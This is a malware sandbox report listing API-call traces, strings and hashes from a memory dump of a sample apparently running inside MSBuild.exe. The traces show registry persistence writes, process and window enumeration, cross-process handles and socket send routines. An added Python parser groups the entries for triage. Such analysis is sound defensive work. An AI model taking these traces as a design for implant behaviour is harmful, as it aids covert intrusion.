                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                • API String ID: 4061214504-1276376045
                                                                                                • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                • Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
                                                                                                • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                • Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C
                                                                                                APIs
                                                                                                • RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
                                                                                                • RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
                                                                                                • RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateValue
                                                                                                • String ID: pth_unenc$BG
                                                                                                • API String ID: 1818849710-2233081382
                                                                                                • Opcode ID: ac20c6f818266d456b173dad8d641fd48acc3e355ae729c9f48089b2aa064521
                                                                                                • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                                                                • Opcode Fuzzy Hash: ac20c6f818266d456b173dad8d641fd48acc3e355ae729c9f48089b2aa064521
                                                                                                • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                                                                                APIs
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,0040483F,00000001,?,00000000,?,0040466D,00000000,?), ref: 00404AED
                                                                                                • SetEvent.KERNEL32(?,?,00000000,?,0040466D,00000000,?), ref: 00404AF9
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,?,0040466D,00000000,?), ref: 00404B04
                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,?,0040466D,00000000,?), ref: 00404B0D
                                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                • String ID: KeepAlive | Disabled
                                                                                                • API String ID: 2993684571-305739064
                                                                                                • Opcode ID: 526203e9eca74a7ac11616e6de4b704dd5e98db1e732fd16a6fd45517b5b1fbb
                                                                                                • Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
                                                                                                • Opcode Fuzzy Hash: 526203e9eca74a7ac11616e6de4b704dd5e98db1e732fd16a6fd45517b5b1fbb
                                                                                                • Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B
                                                                                                APIs
                                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
                                                                                                • PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
                                                                                                • Sleep.KERNEL32(00002710), ref: 00419F79
                                                                                                • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                • String ID: Alarm triggered
                                                                                                • API String ID: 614609389-2816303416
                                                                                                • Opcode ID: ca31e2b0ec9ffc7d76ba02616ca36f971eae7819ef66c75d3d88d4c06d2fc62c
                                                                                                • Instruction ID: 0fe531f7edf44dbbc4d7c544cb5d4c76277d8d7fe89cd9bd4aa838a143c441bc
                                                                                                • Opcode Fuzzy Hash: ca31e2b0ec9ffc7d76ba02616ca36f971eae7819ef66c75d3d88d4c06d2fc62c
                                                                                                • Instruction Fuzzy Hash: 50E09A22A0422033862033BA7C0FC6F3E28DAC6B75B4100BFF905A21A2AE54081086FB
                                                                                                APIs
                                                                                                • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
                                                                                                • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BE86
                                                                                                • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF02), ref: 0041BE93
                                                                                                • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BEA6
                                                                                                Strings
                                                                                                • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                • API String ID: 3024135584-2418719853
                                                                                                • Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                                • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                                                                • Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                                • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5145828a6066f50cf31ff859ee0e23af4d85e603a01b225214a849b1d7000abc
                                                                                                • Instruction ID: 5f24fa964153eb206603784754227e3bedeb81a57cd12874f4c303f17d5dd595
                                                                                                • Opcode Fuzzy Hash: 5145828a6066f50cf31ff859ee0e23af4d85e603a01b225214a849b1d7000abc
                                                                                                • Instruction Fuzzy Hash: FD71C231900216DBEB218F55C884ABFBB75FF55360F14026BEE10A7281D7B89D61CBA9
                                                                                                APIs
                                                                                                  • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                                                                • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                                                                • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                                                                • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                                                                • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                                                                • String ID:
                                                                                                • API String ID: 3525466593-0
                                                                                                • Opcode ID: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                                                • Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
                                                                                                • Opcode Fuzzy Hash: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                                                • Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99
                                                                                                APIs
                                                                                                  • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                                                                  • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
                                                                                                  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                • String ID:
                                                                                                • API String ID: 4269425633-0
                                                                                                • Opcode ID: a53ec5183e024bbcb9521430751280d669ff21e0ce9ca2bf7fd7e75f6157cf8e
                                                                                                • Instruction ID: 1ccfc3ca83e07eb3b8bade3b71d1bee95701cef3987deea6625860c00c24977f
                                                                                                • Opcode Fuzzy Hash: a53ec5183e024bbcb9521430751280d669ff21e0ce9ca2bf7fd7e75f6157cf8e
                                                                                                • Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                • Instruction ID: 1dbcf13812f0ad7c91f1b1cf961d24232ef3b5dad0ac29e3e9285c08b65e5f3f
                                                                                                • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                • Instruction Fuzzy Hash: 4A41D532E002049FEB24DF79C881A5EB3A5EF89718F15856EE915EB341DB35EE01CB84
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043E3ED,?,00000000,?,00000001,?,?,00000001,0043E3ED,?), ref: 0044FF20
                                                                                                • __alloca_probe_16.LIBCMT ref: 0044FF58
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044FFA9
                                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004399BF,?), ref: 0044FFBB
                                                                                                • __freea.LIBCMT ref: 0044FFC4
                                                                                                  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                • String ID:
                                                                                                • API String ID: 313313983-0
                                                                                                • Opcode ID: 32ac3bd373e466217b4644ebee2ff76607fe703c26dcd28c1e1d2c5ecdebf3ce
                                                                                                • Instruction ID: fd0d2a6e26420063bd1679c32ed8e9021f1b2be81e6a043fb7466d0fa567ef17
                                                                                                • Opcode Fuzzy Hash: 32ac3bd373e466217b4644ebee2ff76607fe703c26dcd28c1e1d2c5ecdebf3ce
                                                                                                • Instruction Fuzzy Hash: 9831FE32A0021AABEF248F65DC41EAF7BA5EB05314F05017BFC04D6290EB39DD58CBA4
                                                                                                APIs
                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 0044E144
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
                                                                                                  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
                                                                                                • _free.LIBCMT ref: 0044E1A0
                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                • String ID:
                                                                                                • API String ID: 336800556-0
                                                                                                • Opcode ID: 4bdc18aade4f5afa9f676aa8b8aa9a2318643a84ce2148a0478020116eae0cde
                                                                                                • Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
                                                                                                • Opcode Fuzzy Hash: 4bdc18aade4f5afa9f676aa8b8aa9a2318643a84ce2148a0478020116eae0cde
                                                                                                • Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(0000000A,0000000B,0000000A,00445359,00440A9B,00000000,?,?,?,?,00440C7E,00000000,0000000A,000000FF,0000000A,00000000), ref: 00446F48
                                                                                                • _free.LIBCMT ref: 00446F7D
                                                                                                • _free.LIBCMT ref: 00446FA4
                                                                                                • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00446FB1
                                                                                                • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00446FBA
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_free
                                                                                                • String ID:
                                                                                                • API String ID: 3170660625-0
                                                                                                • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                                • Instruction ID: 6bd692df8320938abc1815071491dbd9703328d73d2f54107518a18b095bb187
                                                                                                • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                                • Instruction Fuzzy Hash: 7401D13620C70067F61266757C85D2F266DDBC3B66727013FF958A2292EE2CCC0A452F
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 0044F7B5
                                                                                                  • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                • _free.LIBCMT ref: 0044F7C7
                                                                                                • _free.LIBCMT ref: 0044F7D9
                                                                                                • _free.LIBCMT ref: 0044F7EB
                                                                                                • _free.LIBCMT ref: 0044F7FD
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                • Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
                                                                                                • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                • Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00443305
                                                                                                  • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                • _free.LIBCMT ref: 00443317
                                                                                                • _free.LIBCMT ref: 0044332A
                                                                                                • _free.LIBCMT ref: 0044333B
                                                                                                • _free.LIBCMT ref: 0044334C
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                • Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
                                                                                                • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                • Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E
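The per-function entries above (an APIs list, the memory dump source, and the Similarity fields with the API ID, String ID and fuzzy hashes) are what an analyst has to read to see that this MSBuild dump enumerates processes with Toolhelp32 and opens them, walks visible windows, and plays an "Alarm triggered" sound after a 10 s Sleep. The parser below is an added example, not code from Joe Sandbox or from this report: it turns entries in the plain-text layout rendered here into records and applies a small capability table of its own (the rule names and API sets are this example's assumptions, not a Joe Sandbox classification). The sample input is an abridged copy of two entries from this listing, embedded so the script runs offline.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: an abridged copy of two function entries from this report's
# MSBuild memory-dump listing, in the text layout the report renders.
SAMPLE = """\
APIs
  • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
• Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
  • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
• String ID:
• API String ID: 4269425633-0
• Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A
APIs
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
• GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
• PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
• Sleep.KERNEL32(00002710), ref: 00419F79
• PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: PlaySound$HandleLocalModuleSleepTime
• String ID: Alarm triggered
• API String ID: 614609389-2816303416
• Instruction Fuzzy Hash: 50E09A22A0422033862033BA7C0FC6F3E28DAC6B75B4100BFF905A21A2AE54081086FB
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Yara matches", "Similarity"}

# One API line: optional "Part of subcall function X:" prefix, Name.MODULE(args), ref: addr.
# Calls printed without parentheses (e.g. __alloca_probe_16.LIBCMT ref: ...) also match.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-F]{8}): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})$"
)

@dataclass
class ApiCall:
    name: str
    module: str
    args: list    # argument values as printed; "?" where the sandbox could not resolve one
    ref: str      # call-site address
    caller: str   # "" for a direct call, else the subcall function the report attributes it to

@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)   # "API ID", "String ID", hashes, dump source

def parse_entries(text):
    """Split the listing into FunctionEntry records; 'Instruction Fuzzy Hash' is the
    last field the report prints for a function, so it closes an entry."""
    entries, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if cur is None:
            cur, section = FunctionEntry(), None
        if line in SECTION_HEADERS:
            section = line
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = m["args"].split(",") if m["args"] else []
                cur.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["caller"] or ""))
            continue
        if section == "Strings":
            cur.strings.append(line)
            continue
        key, sep, value = line.partition(":")
        if sep:
            cur.fields[key] = value.strip()
            if key == "Instruction Fuzzy Hash":
                entries.append(cur)
                cur = None
    return entries

# Triage heuristics (this example's own assumption, not a Joe Sandbox classification):
# every API in a set must appear in one function, directly or through a reported subcall.
CAPABILITY_RULES = {
    "process enumeration": {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"},
    "cross-process handle": {"OpenProcess"},
    "window enumeration": {"GetWindowThreadProcessId", "GetWindowTextW", "IsWindowVisible"},
    "audible alarm with delay": {"PlaySoundW", "Sleep"},
    "console banner": {"GetStdHandle", "SetConsoleTextAttribute"},
}

def capabilities(entry):
    names = {call.name for call in entry.apis}
    return sorted(cap for cap, needed in CAPABILITY_RULES.items() if needed <= names)

def sleep_delays_ms(entry):
    """Decode the hex dwMilliseconds argument of each resolved Sleep call (0x2710 = 10 s)."""
    return [int(call.args[0], 16) for call in entry.apis
            if call.name == "Sleep" and call.args and call.args[0] != "?"]
```

Run it over a saved copy of the full listing and the functions that combine Toolhelp32 enumeration with OpenProcess, or window enumeration with OpenProcess, surface immediately; the hex arguments are kept as printed so that values such as the Sleep delay or the OpenProcess access mask (0x400 and 0x1000 in the entries above) can be decoded without re-reading the disassembly.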
                                                                                                APIs
                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                                                                • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                                                                • IsWindowVisible.USER32(?), ref: 004167A1
                                                                                                  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ProcessWindow$Open$TextThreadVisible
                                                                                                • String ID: (FG
                                                                                                • API String ID: 3142014140-2273637114
                                                                                                • Opcode ID: 445514f8f10a0b8609e824b62e8f8a93a687c6967793b9b12c59755632f7be03
                                                                                                • Instruction ID: 6337817d5adb2ff800b6fe7f9081d1b6a06097940366009b721c4d78a1625a25
                                                                                                • Opcode Fuzzy Hash: 445514f8f10a0b8609e824b62e8f8a93a687c6967793b9b12c59755632f7be03
                                                                                                • Instruction Fuzzy Hash: FD71E6321082414AC325FB61D8A5ADFB3E4AFE4319F50453EF58A530E1EF746A49C79A
                                                                                                APIs
                                                                                                • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                                                                  • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                  • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                  • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF
                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                                                                • String ID: XCG$`AG$>G
                                                                                                • API String ID: 2334542088-2372832151
                                                                                                • Opcode ID: e239f70684f8ed08a2f75d87af0facd3263048ec0520102d7ec34cb9f50fb045
                                                                                                • Instruction ID: 7adbea44916697806613a62f0197ef330eb15d5bc584e2d7fa9685cab7613629
                                                                                                • Opcode Fuzzy Hash: e239f70684f8ed08a2f75d87af0facd3263048ec0520102d7ec34cb9f50fb045
                                                                                                • Instruction Fuzzy Hash: 865143321042405BC325F775D8A2AEF73D5AFE4308F50483FF84A671E2EE785949C69A
                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000104), ref: 00442714
                                                                                                • _free.LIBCMT ref: 004427DF
                                                                                                • _free.LIBCMT ref: 004427E9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$FileModuleName
                                                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                • API String ID: 2506810119-4083458154
